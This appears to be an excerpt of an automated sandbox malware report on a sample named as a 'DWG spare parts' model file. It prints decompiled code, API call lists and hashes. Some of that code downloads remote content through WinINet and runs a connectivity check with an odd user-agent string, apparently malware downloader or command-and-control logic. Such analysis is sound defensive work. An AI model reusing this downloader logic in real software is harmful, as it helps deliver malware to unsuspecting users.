					 *0x256d4d0 = _t22;
					if( *0x256d4d0 == 0) {
						__eflags = 0;
						_pop(_t49);
						 *[fs:eax] = _t49;
						_push(0x2525a9c);
						_t24 =  *0x256d4cc; // 0xcc0004
						return InternetCloseHandle(_t24);
					} else {
						_push(_t56);
						_push(0x2525a75);
						_push( *[fs:eax]);
						 *[fs:eax] = _t57;
						do {
							_t27 =  *0x256d4d0; // 0xcc000c
							InternetReadFile(_t27, 0x256d4d4, 0x401, 0x256d8d8); // executed
							_t43 =  *0x256d8d8; // 0x0
							E02514990(0x256da7c, _t43, 0x256d4d4, 0);
							_t51 =  *0x256da7c; // 0x0
							E02514B6C(_t37, _t51);
						} while ( *0x256d8d8 != 0);
						_pop(_t52);
						 *[fs:eax] = _t52;
						_push(0x2525a7c);
						_t34 =  *0x256d4d0; // 0xcc000c
						return InternetCloseHandle(_t34);
					}
				}
			}



















                                                                0x02525975
                                                                0x02525977
                                                                0x0252597b
                                                                0x0252597d
                                                                0x02525981
                                                                0x02525982
                                                                0x02525987
                                                                0x0252598a
                                                                0x0252598f
                                                                0x025259a1
                                                                0x025259aa
                                                                0x025259bd
                                                                0x025259c9
                                                                0x02525a9c
                                                                0x02525a9e
                                                                0x02525aa1
                                                                0x02525aa4
                                                                0x02525ab1
                                                                0x025259cf
                                                                0x025259d1
                                                                0x025259d2
                                                                0x025259d7
                                                                0x025259da
                                                                0x025259ea
                                                                0x025259f0
                                                                0x025259f6
                                                                0x025259fb
                                                                0x02525a07
                                                                0x02525a7c
                                                                0x02525a7e
                                                                0x02525a81
                                                                0x02525a84
                                                                0x02525a89
                                                                0x02525a94
                                                                0x02525a09
                                                                0x02525a0b
                                                                0x02525a0c
                                                                0x02525a11
                                                                0x02525a14
                                                                0x02525a17
                                                                0x02525a26
                                                                0x02525a2c
                                                                0x02525a3b
                                                                0x02525a41
                                                                0x02525a48
                                                                0x02525a4e
                                                                0x02525a53
                                                                0x02525a5e
                                                                0x02525a61
                                                                0x02525a64
                                                                0x02525a69
                                                                0x02525a74
                                                                0x02525a74
                                                                0x02525a07

                                                                APIs
                                                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 025259B8
                                                                • InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,04000000,00000000), ref: 025259F6
                                                                • InternetReadFile.WININET(00CC000C,0256D4D4,00000401,0256D8D8), ref: 02525A2C
                                                                • InternetCloseHandle.WININET(00CC000C), ref: 02525A6F
                                                                • InternetCloseHandle.WININET(00CC0004), ref: 02525A8F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID:
                                                                • API String ID: 3121278467-0
                                                                • Opcode ID: ae960e49e35cff05edebd2255b72e91e0afbf8ba6525054102531904b5bd00cd
                                                                • Instruction ID: 0bb42476237b219f2de2e2d5f17e4161454f5a686291814022291dd1e4ade3fb
                                                                • Opcode Fuzzy Hash: ae960e49e35cff05edebd2255b72e91e0afbf8ba6525054102531904b5bd00cd
                                                                • Instruction Fuzzy Hash: 2C318D70784341AEF7199B68DC9AB2937AAF789B11F914C61F10097AC0E7B5AC18DB1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0252521C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 59networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5013 252521c-2525260 InternetOpenA call 2514d64 InternetOpenUrlA 5016 2525262-2525264 5013->5016 5017 2525266-252529f HttpQueryInfoA 5013->5017 5018 25252db-25252e9 InternetCloseHandle 5016->5018 5019 25252a1-25252a3 5017->5019 5020 25252a5-25252c8 call 2514b10 call 2514cb0 5017->5020 5021 25252d0-25252d6 InternetCloseHandle 5019->5021 5026 25252ca-25252cc 5020->5026 5027 25252ce 5020->5027 5021->5018 5026->5021 5027->5021
                                                                C-Code - Quality: 100%
                                                                			E0252521C(void* __eax) {
				void* _t2;
				char* _t4;
				void* _t5;
				void* _t6;
				void* _t8;
				intOrPtr _t12;
				void* _t14;
				void* _t16;
				void* _t19;
				intOrPtr _t20;

				_t19 = __eax;
				_t2 = InternetOpenA("lVali", 4, 0, 0, 0); // executed
				 *0x256daa4 = _t2;
				_t4 = E02514D64(_t19);
				_t5 =  *0x256daa4; // 0xcc0004
				_t6 = InternetOpenUrlA(_t5, _t4, 0, 0, 0x200, 0); // executed
				 *0x256daa8 = _t6;
				if( *0x256daa8 != 0) {
					 *0x256dcb0 = 0;
					 *0x256dcb4 = 0x201;
					_t8 =  *0x256daa8; // 0xcc000c
					 *0x256dcb8 = HttpQueryInfoA(_t8, 0x13, "200", 0x256dcb4, 0x256dcb0);
					__eflags =  *0x256dcb8;
					if( *0x256dcb8 != 0) {
						E02514B10(0x256dcbc, 0x201, 0x256daac);
						_t12 =  *0x256dcbc; // 0x2a51b78
						E02514CB0(_t12, 0x25252fc);
						if(__eflags != 0) {
							_t20 = 0;
							__eflags = 0;
						} else {
							_t20 = 1;
						}
					} else {
						_t20 = 0;
					}
					_t14 =  *0x256daa8; // 0xcc000c
					InternetCloseHandle(_t14);
				} else {
					_t20 = 0;
				}
				_t16 =  *0x256daa4; // 0xcc0004
				InternetCloseHandle(_t16);
				return _t20;
			}













                                                                0x0252521d
                                                                0x0252522c
                                                                0x02525231
                                                                0x02525243
                                                                0x02525249
                                                                0x0252524f
                                                                0x02525254
                                                                0x02525260
                                                                0x02525268
                                                                0x0252526d
                                                                0x02525288
                                                                0x02525293
                                                                0x02525298
                                                                0x0252529f
                                                                0x025252b4
                                                                0x025252b9
                                                                0x025252c3
                                                                0x025252c8
                                                                0x025252ce
                                                                0x025252ce
                                                                0x025252ca
                                                                0x025252ca
                                                                0x025252ca
                                                                0x025252a1
                                                                0x025252a1
                                                                0x025252a1
                                                                0x025252d0
                                                                0x025252d6
                                                                0x02525262
                                                                0x02525262
                                                                0x02525262
                                                                0x025252db
                                                                0x025252e1
                                                                0x025252e9

                                                                APIs
                                                                • InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0252522C
                                                                • InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000200,00000000), ref: 0252524F
                                                                • HttpQueryInfoA.WININET(00CC000C,00000013,200,0256DCB4,0256DCB0), ref: 0252528E
                                                                • InternetCloseHandle.WININET(00CC000C), ref: 025252D6
                                                                • InternetCloseHandle.WININET(00CC0004), ref: 025252E1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                • String ID: 200$200$lVali
                                                                • API String ID: 3871184103-2774994813
                                                                • Opcode ID: 49641683b32eed044a59167b472cbf0305e2c3e9dce59ca401e797059a54b5f2
                                                                • Instruction ID: 5b614a8c29ecab13e201a89af31acdd2fcff5b80f06b46717ce41cc8a026b4a4
                                                                • Opcode Fuzzy Hash: 49641683b32eed044a59167b472cbf0305e2c3e9dce59ca401e797059a54b5f2
                                                                • Instruction Fuzzy Hash: 52113A71BCE3056EFB10AFB89989B1236A6B749704F541D25F2009B6C0EAE6D4589B0C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02511754 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5061 2511754-2511766 5062 2511998-251199d 5061->5062 5063 251176c-251177c 5061->5063 5066 2511ab0-2511ab3 5062->5066 5067 25119a3-25119b4 5062->5067 5064 25117d4-25117dd 5063->5064 5065 251177e-251178b 5063->5065 5064->5065 5072 25117df-25117eb 5064->5072 5068 25117a4-25117b0 5065->5068 5069 251178d-251179a 5065->5069 5073 25116b4-25116dd VirtualAlloc 5066->5073 5074 2511ab9-2511abb 5066->5074 5070 25119b6-25119d2 5067->5070 5071 2511968-2511975 5067->5071 5078 2511820-2511829 5068->5078 5079 25117b2-25117c0 5068->5079 5075 25117c4-25117d1 5069->5075 5076 251179c-25117a0 5069->5076 5082 25119e0-25119ef 5070->5082 5083 25119d4-25119dc 5070->5083 5071->5070 5077 2511977-251198b Sleep 5071->5077 5072->5065 5084 25117ed-25117f9 5072->5084 5080 251170f-2511715 5073->5080 5081 25116df-251170c call 2511674 5073->5081 5077->5070 5085 251198d-2511994 Sleep 5077->5085 5091 251182b-2511838 5078->5091 5092 251185c-2511866 5078->5092 5081->5080 5088 25119f1-2511a05 5082->5088 5089 2511a08-2511a10 5082->5089 5087 2511a3c-2511a52 5083->5087 5084->5065 5090 25117fb-251180e Sleep 5084->5090 5085->5071 5093 2511a54-2511a62 5087->5093 5094 2511a6b-2511a77 5087->5094 5088->5087 5099 2511a12-2511a2a 5089->5099 5100 2511a2c-2511a2e call 25115fc 5089->5100 5090->5065 5098 2511814-251181b Sleep 5090->5098 5091->5092 5101 251183a-251184e Sleep 5091->5101 5095 25118d8-25118e4 5092->5095 5096 2511868-2511893 5092->5096 5093->5094 5102 2511a64 5093->5102 5105 2511a79-2511a8c 5094->5105 5106 2511a98 5094->5106 5107 25118e6-25118f8 5095->5107 5108 251190c-251191b call 25115fc 5095->5108 5103 2511895-25118a3 5096->5103 5104 25118ac-25118ba 5096->5104 5098->5064 5109 2511a33-2511a3b 5099->5109 5100->5109 5101->5092 5111 2511850-2511857 Sleep 5101->5111 5102->5094 5103->5104 5112 25118a5 5103->5112 5113 2511928 5104->5113 5114 25118bc-25118d6 call 2511530 5104->5114 5115 2511a9d-2511aaf 5105->5115 5116 2511a8e-2511a93 call 2511530 5105->5116 5106->5115 5117 25118fa 5107->5117 5118 25118fc-251190a 5107->5118 5120 251192d-2511966 5108->5120 5126 251191d-2511927 5108->5126 5111->5091 5112->5104 5113->5120 5114->5120 5116->5115 5117->5118 5118->5120
                                                                C-Code - Quality: 67%
                                                                			E02511754(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x256a045; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E02511674();
								_t99 =  *0x256c7a8; // 0x7ef90000
								 *_t147 = 0x256c7a4;
								 *0x256c7a8 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x256c7a0 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x256a710], ah");
								if(__eflags == 0) {
									goto L39;
								}
								Sleep(0);
								asm("lock cmpxchg [0x256a710], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L39;
							}
						}
						L39:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x256a720 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x256a71c;
							if((0xfffffffe << _t132 &  *0x256a71c) == 0) {
								_t133 =  *0x256a718; // 0x84dc0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E025115FC(_t125);
								} else {
									_t110 =  *0x256a714; // 0x29a4dd0
									_t109 = _t110 - _t125;
									 *0x256a714 = _t109;
									 *0x256a718 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x256a710 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L47;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L47:
							_push(_t152);
							_push(_t145);
							_t148 = 0x256a7a0 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x256a720 + _t142 * 4;
								 *_t80 =  *(0x256a720 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x256a71c], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E02511530(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							 *(_t159 - 4) = _t125 + 2;
							 *0x256a710 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					__eax =  *(__edx + 0x256a5b8) & 0x000000ff;
					__ebx = 0x252d044 + ( *(__edx + 0x256a5b8) & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									__eflags = __ebx;
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [ebx], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 4);
					__eax =  *(__edx + 8);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x10);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0xc);
						if(__eax >  *(__ebx + 0xc)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x256a045;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x256a710], ah");
									if(__eflags == 0) {
										goto L20;
									}
									Sleep(0);
									__eax = 0x100;
									asm("lock cmpxchg [0x256a710], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
									goto L20;
								}
							}
							L20:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x256a71c;
							__eflags =  *(__ebx + 1) &  *0x256a71c;
							if(( *(__ebx + 1) &  *0x256a71c) == 0) {
								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
								__edi =  *0x256a718; // 0x84dc0
								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
									__edi = __eax;
									__eax = E025115FC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L33;
									} else {
										 *0x256a710 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x256a714; // 0x29a4dd0
									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x256a718 =  *0x256a718 - __edi;
									 *0x256a714 = __esi;
									goto L33;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x256a720 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x256a720 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x256a7a0 + ( *(0x256a720 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x256a720 + __eax * 4;
									 *_t38 =  *(0x256a720 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x256a71c], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E02511530(__eax, __ecx, __edx);
								}
								L33:
								_t56 = __edi + 6; // 0x84dc6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x256a710 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 8)) = 0;
								 *((intOrPtr*)(__esi + 0xc)) = 1;
								 *(__ebx + 0x10) = __esi;
								_t61 = __esi + 0x20; // 0x29a4df0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 8) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0xc) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0xc;
							 *_t19 =  *(__edx + 0xc) + 1;
							__eflags =  *_t19;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 4);
							 *(__ecx + 0x14) = __ebx;
							 *(__ebx + 4) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                0x02511760
                                                                0x02511766
                                                                0x02511998
                                                                0x0251199d
                                                                0x02511ab0
                                                                0x02511ab1
                                                                0x02511ab3
                                                                0x025116b4
                                                                0x025116b8
                                                                0x025116c4
                                                                0x025116d4
                                                                0x025116d9
                                                                0x025116dd
                                                                0x025116df
                                                                0x025116e1
                                                                0x025116e7
                                                                0x025116ea
                                                                0x025116ef
                                                                0x025116f4
                                                                0x025116fa
                                                                0x02511700
                                                                0x02511703
                                                                0x02511705
                                                                0x0251170c
                                                                0x0251170c
                                                                0x02511715
                                                                0x02511ab9
                                                                0x02511ab9
                                                                0x02511abb
                                                                0x02511abb
                                                                0x025119a3
                                                                0x025119af
                                                                0x025119b2
                                                                0x025119b4
                                                                0x02511968
                                                                0x0251196d
                                                                0x02511975
                                                                0x00000000
                                                                0x00000000
                                                                0x02511979
                                                                0x02511983
                                                                0x0251198b
                                                                0x0251198f
                                                                0x00000000
                                                                0x0251198f
                                                                0x00000000
                                                                0x0251198b
                                                                0x02511968
                                                                0x025119b6
                                                                0x025119b6
                                                                0x025119be
                                                                0x025119c1
                                                                0x025119cb
                                                                0x025119cb
                                                                0x025119d2
                                                                0x025119e5
                                                                0x025119e9
                                                                0x025119ef
                                                                0x02511a08
                                                                0x02511a0e
                                                                0x02511a0e
                                                                0x02511a10
                                                                0x02511a2e
                                                                0x02511a12
                                                                0x02511a12
                                                                0x02511a17
                                                                0x02511a19
                                                                0x02511a1e
                                                                0x02511a27
                                                                0x02511a27
                                                                0x02511a33
                                                                0x02511a3b
                                                                0x025119f1
                                                                0x025119f1
                                                                0x025119fb
                                                                0x02511a03
                                                                0x00000000
                                                                0x02511a03
                                                                0x025119d4
                                                                0x025119d7
                                                                0x025119da
                                                                0x02511a3c
                                                                0x02511a3c
                                                                0x02511a3d
                                                                0x02511a3e
                                                                0x02511a45
                                                                0x02511a48
                                                                0x02511a4b
                                                                0x02511a4e
                                                                0x02511a50
                                                                0x02511a52
                                                                0x02511a59
                                                                0x02511a5b
                                                                0x02511a5b
                                                                0x02511a5b
                                                                0x02511a62
                                                                0x02511a64
                                                                0x02511a64
                                                                0x02511a62
                                                                0x02511a70
                                                                0x02511a75
                                                                0x02511a75
                                                                0x02511a77
                                                                0x02511a98
                                                                0x02511a98
                                                                0x02511a98
                                                                0x02511a79
                                                                0x02511a79
                                                                0x02511a7f
                                                                0x02511a82
                                                                0x02511a86
                                                                0x02511a8c
                                                                0x02511a8e
                                                                0x02511a8e
                                                                0x02511a8c
                                                                0x02511aa0
                                                                0x02511aa3
                                                                0x02511aaf
                                                                0x02511aaf
                                                                0x025119d2
                                                                0x0251176c
                                                                0x0251176c
                                                                0x0251176e
                                                                0x02511775
                                                                0x0251177c
                                                                0x025117d4
                                                                0x025117d4
                                                                0x025117d9
                                                                0x025117dd
                                                                0x00000000
                                                                0x00000000
                                                                0x025117df
                                                                0x025117df
                                                                0x025117e2
                                                                0x025117e7
                                                                0x025117eb
                                                                0x025117ed
                                                                0x025117ed
                                                                0x025117f0
                                                                0x025117f5
                                                                0x025117f9
                                                                0x025117fb
                                                                0x025117fb
                                                                0x02511800
                                                                0x02511805
                                                                0x0251180a
                                                                0x0251180e
                                                                0x02511816
                                                                0x00000000
                                                                0x02511816
                                                                0x0251180e
                                                                0x025117f9
                                                                0x00000000
                                                                0x025117eb
                                                                0x025117d4
                                                                0x0251177e
                                                                0x0251177e
                                                                0x02511781
                                                                0x02511784
                                                                0x02511789
                                                                0x0251178b
                                                                0x025117a4
                                                                0x025117a7
                                                                0x025117ab
                                                                0x025117ad
                                                                0x025117b0
                                                                0x02511820
                                                                0x02511821
                                                                0x02511822
                                                                0x02511829
                                                                0x0251182b
                                                                0x0251182b
                                                                0x02511830
                                                                0x02511838
                                                                0x00000000
                                                                0x00000000
                                                                0x0251183c
                                                                0x02511841
                                                                0x02511846
                                                                0x0251184e
                                                                0x02511852
                                                                0x00000000
                                                                0x02511852
                                                                0x00000000
                                                                0x0251184e
                                                                0x0251182b
                                                                0x0251185c
                                                                0x02511860
                                                                0x02511860
                                                                0x02511866
                                                                0x025118d8
                                                                0x025118dc
                                                                0x025118e2
                                                                0x025118e4
                                                                0x0251190c
                                                                0x02511910
                                                                0x02511912
                                                                0x02511917
                                                                0x02511919
                                                                0x0251191b
                                                                0x00000000
                                                                0x0251191d
                                                                0x0251191d
                                                                0x02511922
                                                                0x02511924
                                                                0x02511925
                                                                0x02511926
                                                                0x02511927
                                                                0x02511927
                                                                0x025118e6
                                                                0x025118e6
                                                                0x025118ec
                                                                0x025118f0
                                                                0x025118f6
                                                                0x025118f8
                                                                0x025118fa
                                                                0x025118fa
                                                                0x025118fc
                                                                0x025118fe
                                                                0x02511904
                                                                0x00000000
                                                                0x02511904
                                                                0x02511868
                                                                0x02511868
                                                                0x0251186b
                                                                0x02511872
                                                                0x02511879
                                                                0x0251187c
                                                                0x0251187f
                                                                0x02511886
                                                                0x02511889
                                                                0x0251188c
                                                                0x0251188f
                                                                0x02511891
                                                                0x02511893
                                                                0x02511895
                                                                0x0251189a
                                                                0x0251189c
                                                                0x0251189c
                                                                0x0251189c
                                                                0x025118a3
                                                                0x025118a5
                                                                0x025118a5
                                                                0x025118a3
                                                                0x025118ac
                                                                0x025118b1
                                                                0x025118b4
                                                                0x025118ba
                                                                0x02511928
                                                                0x02511928
                                                                0x02511928
                                                                0x025118bc
                                                                0x025118bc
                                                                0x025118be
                                                                0x025118c2
                                                                0x025118c4
                                                                0x025118c7
                                                                0x025118ca
                                                                0x025118cd
                                                                0x025118d1
                                                                0x025118d1
                                                                0x0251192d
                                                                0x0251192d
                                                                0x0251192d
                                                                0x02511930
                                                                0x02511933
                                                                0x02511935
                                                                0x0251193a
                                                                0x0251193c
                                                                0x0251193f
                                                                0x02511946
                                                                0x02511949
                                                                0x02511949
                                                                0x0251194c
                                                                0x02511950
                                                                0x02511953
                                                                0x02511956
                                                                0x02511958
                                                                0x02511958
                                                                0x0251195a
                                                                0x0251195d
                                                                0x02511960
                                                                0x02511963
                                                                0x02511964
                                                                0x02511965
                                                                0x02511966
                                                                0x02511966
                                                                0x025117b2
                                                                0x025117b2
                                                                0x025117b2
                                                                0x025117b2
                                                                0x025117b6
                                                                0x025117b9
                                                                0x025117bc
                                                                0x025117bf
                                                                0x025117c0
                                                                0x025117c0
                                                                0x0251178d
                                                                0x0251178d
                                                                0x02511791
                                                                0x02511791
                                                                0x02511794
                                                                0x02511797
                                                                0x0251179a
                                                                0x025117c4
                                                                0x025117c7
                                                                0x025117ca
                                                                0x025117cd
                                                                0x025117d0
                                                                0x025117d1
                                                                0x0251179c
                                                                0x0251179c
                                                                0x0251179f
                                                                0x025117a0
                                                                0x025117a0
                                                                0x0251179a
                                                                0x0251178b

                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 02511800
                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02511816
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 657b4b38884e583c60f6f39a7ad79780a26956d45491f53fc7ecb79693144edf
                                                                • Instruction ID: 112f6e373ae3ccd05ae868ace07f8898ed4745737df4bbd7bd6819534ae40106
                                                                • Opcode Fuzzy Hash: 657b4b38884e583c60f6f39a7ad79780a26956d45491f53fc7ecb79693144edf
                                                                • Instruction Fuzzy Hash: 7FB13372A00A518BE715CF2CE498365BFE1FB80320F08C6EED65A9B385C7709855CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02511ABC Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
